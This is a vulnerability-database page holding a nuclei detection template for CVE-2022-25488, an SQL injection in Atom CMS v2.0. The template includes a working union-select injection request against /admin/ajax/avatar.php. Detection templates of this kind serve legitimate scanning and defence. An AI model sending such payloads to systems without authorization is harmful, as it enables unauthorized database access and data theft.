Lucene search
K

Atom CMS v2.0 - SQL Injection

🗓️ 02 Jul 2026 09:36:57Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 34 Views

Atom CMS v2.0 - SQL Injection via /admin/ajax/avatar.ph

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2022-25488
15 Mar 202218:15
attackerkb
Circl
CVE-2022-25488
15 Mar 202221:19
circl
CNNVD
Atom CMS SQL注入漏洞
15 Mar 202200:00
cnnvd
CNVD
Atom CMS SQL Injection Vulnerability
17 Mar 202200:00
cnvd
CVE
CVE-2022-25488
15 Mar 202217:40
cve
Cvelist
CVE-2022-25488
15 Mar 202217:40
cvelist
NVD
CVE-2022-25488
15 Mar 202218:15
nvd
OSV
CVE-2022-25488
15 Mar 202218:15
osv
Prion
Sql injection
15 Mar 202218:15
prion
RedhatCVE
CVE-2022-25488
23 May 202500:06
redhatcve
Rows per page
id: CVE-2022-25488

info:
  name: Atom CMS v2.0 - SQL Injection
  author: theamanrawat
  severity: critical
  description: |
    Atom CMS v2.0 was discovered to contain a SQL injection vulnerability via the id parameter in /admin/ajax/avatar.php.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
  remediation: Fixed in version Atom CMS v2.1
  reference:
    - https://github.com/thedigicraft/Atom.CMS/issues/257
    - https://nvd.nist.gov/vuln/detail/CVE-2022-25488
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/superlink996/chunqiuyunjingbachang
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-25488
    cwe-id: CWE-89
    epss-score: 0.07148
    epss-percentile: 0.93495
    cpe: cpe:2.3:a:thedigitalcraft:atomcms:2.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: thedigitalcraft
    product: atomcms
  tags: cve,cve2022,sqli,atom,cms,thedigitalcraft,vkev,vuln
variables:
  num: "999999999"

http:
  - method: GET
    path:
      - "{{BaseURL}}/admin/ajax/avatar.php?id=-1+union+select+md5({{num}})%23"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "/{{md5(num)}}"
          - "avatar-container"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100a95f1cd28f1f110e38da21bc80df403fe4fc92cae0227b07986075c35762f1100220508ca35bdc5ba561e6fdd2c3509b0e4f8b8a6462b10a85538c83cdedf4b63131:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.3High risk
Vulners AI Score7.3
CVSS 27.5
CVSS 3.19.8
EPSS0.07148
34